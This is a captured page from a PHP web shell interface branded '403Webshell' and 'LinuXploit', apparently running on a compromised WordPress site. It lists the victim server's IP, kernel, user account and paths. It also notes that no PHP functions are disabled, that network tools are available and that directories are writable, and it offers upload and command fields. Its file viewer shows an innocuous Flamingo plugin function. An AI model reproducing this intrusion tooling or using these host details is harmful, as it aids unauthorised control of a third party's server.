403Webshell
Server IP : 103.255.250.91  /  Your IP : 216.73.217.146
Web Server : Apache
System : Linux charlie.thegoodhost.io 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
User : tongkhen ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tongkhen/domains/wengbee.com/wp-content/plugins/flamingo/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tongkhen/domains/wengbee.com/wp-content/plugins/flamingo/includes/formatting.php
<?php

function flamingo_htmlize( $val ) {
	$result = '';

	if ( is_array( $val ) ) {
		foreach ( $val as $v ) {
			$result .= sprintf( '<li>%s</li>', flamingo_htmlize( $v ) );
		}

		$result = sprintf( '<ul>%s</ul>', $result );
	} else {
		$result = wpautop( esc_html( (string) $val ) );
	}

	return apply_filters( 'flamingo_htmlize', $result, $val );
}

Youez - 2016 - github.com/yon3zu
LinuXploit